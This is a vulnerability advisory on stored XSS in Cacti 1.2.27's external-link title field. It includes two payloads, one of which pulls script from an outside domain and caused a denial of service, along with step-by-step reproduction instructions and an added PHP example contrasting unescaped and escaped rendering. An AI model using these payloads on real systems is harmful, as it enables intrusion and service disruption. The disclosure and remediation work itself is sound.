Summary
The title parameter is not properly sanitized when saving external links in links.php. Moreover, the title parameter is stored in the database and reflected back to the user in index.php, leading to stored XSS.
Details
Users with the privilege to create external links can manipulate the title parameter in the HTTP POST request while creating external links to perform stored XSS attacks. The vulnerability known as XSS (Cross-Site Scripting) occurs when an application allows untrusted user input to be displayed on a web page without proper validation or escaping.
The screenshot below shows the tester entered the payload <svg/onload=alert()> to prove the existence of the XSS vulnerability.
The screenshot below shows the HTTP POST request that was sent. As seen, the payload resides in the title parameter.
The screenshot below shows that the external link is created in the console menu and is visible there. It also shows the version of Cacti under test which is 1.2.27.
The screenshot below shows that the alert box popped up, thereby proving the existence of the XSS vulnerability.
This XSS vulnerability is limited by the fact that the aforementioned title parameter does not allow long strings to be entered. Therefore, with the payload in its current form, this vulnerability has an impact on neither confidentiality nor integrity. However, as seen in the screenshot below, the following payload <script/src=//⑮.rs causes a denial of service in the frontend, thereby rendering the application unavailable.
As seen in the screenshot below, clicking the items in the console menu (this applies to all items in the console menu) no longer shows the returned data. One cannot even delete the external link causing the issue. I had to delete the external link information from the database to be able to resume normal operations.
Below is the screenshot of the vulnerable code.
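The following is an added illustration, not Cacti's own code and not the code shown in the screenshot. It contrasts the pattern described above (a stored external-link title echoed into the console menu without escaping) with an output-escaped version, adds a save-time check for the title field, and includes a helper for finding titles that already contain markup in stored rows, since the report notes the offending link could only be removed directly in the database. The function names, the row structure, the 64-character limit and the sample rows are assumptions made for the example.

```php
<?php
// Added example, not Cacti's own code. Function names, the $rows structure
// and the length limit are assumptions for illustration.

// Vulnerable pattern: the stored title is concatenated straight into the markup
// of the console menu, so any HTML in it becomes part of the page.
function render_menu_item_vulnerable(string $title, string $url): string {
    return '<li><a href="' . $url . '">' . $title . '</a></li>';
}

// Hardened pattern: escape on output. ENT_QUOTES covers both quote styles so the
// value is also safe inside attribute values; UTF-8 is specified so multibyte
// input (such as the circled digit in the second payload) is converted rather
// than silently dropped.
function render_menu_item_safe(string $title, string $url): string {
    $t = htmlspecialchars($title, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $u = htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<li><a href="' . $u . '">' . $t . '</a></li>';
}

// Save-time check for the title field in links.php: a menu label has no
// legitimate use for markup, so reject anything containing < or >. The 64
// character limit is an assumption standing in for the short field the report
// mentions.
function validate_title(string $title): bool {
    if ($title === '' || mb_strlen($title, 'UTF-8') > 64) {
        return false;
    }
    return strpbrk($title, '<>') === false;
}

// Remediation aid: list the ids of already-stored rows whose title contains
// markup. $rows stands in for the result of a query against the external
// links table; the table and column names are assumptions.
function find_markup_in_titles(array $rows): array {
    $hits = [];
    foreach ($rows as $row) {
        if (strpbrk($row['title'], '<>') !== false) {
            $hits[] = $row['id'];
        }
    }
    return $hits;
}

// Constructed sample rows, including the two payloads quoted in the report.
$rows = [
    ['id' => 1, 'title' => 'Wiki',                  'url' => 'https://wiki.example/'],
    ['id' => 2, 'title' => '<svg/onload=alert()>',  'url' => 'https://example.com/'],
    ['id' => 3, 'title' => '<script/src=//⑮.rs',    'url' => 'https://example.com/'],
];

foreach ($rows as $row) {
    echo render_menu_item_safe($row['title'], $row['url']), PHP_EOL;
}

var_dump(validate_title('Wiki'));
var_dump(validate_title('<svg/onload=alert()>'));
print_r(find_markup_in_titles($rows));
```

With the escaped renderer the angle brackets of rows 2 and 3 are emitted as character entities, so the browser shows the title as literal text and creates no element; the vulnerable renderer would emit them as-is. The save-time check rejects both payloads, and the audit helper returns the ids of rows 2 and 3 so they can be corrected without hand-editing the database.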
PoC
Payload1: <svg/onload=alert()>
Payload2: <script/src=//⑮.rs
- Go to External Links under Utilities menu.
- Click on + sign to add a new external link.
- Choose Console Menu as style.
- Choose External Links as Console Menu Section.
- Place payload1 or payload2 as the Tab/Menu Name.
- Add a random Web URL Location.
- Click on save.
- Finally, click on Main Console (index.php) to trigger the XSS (one may need to refresh the page).
Impact
Denial of Service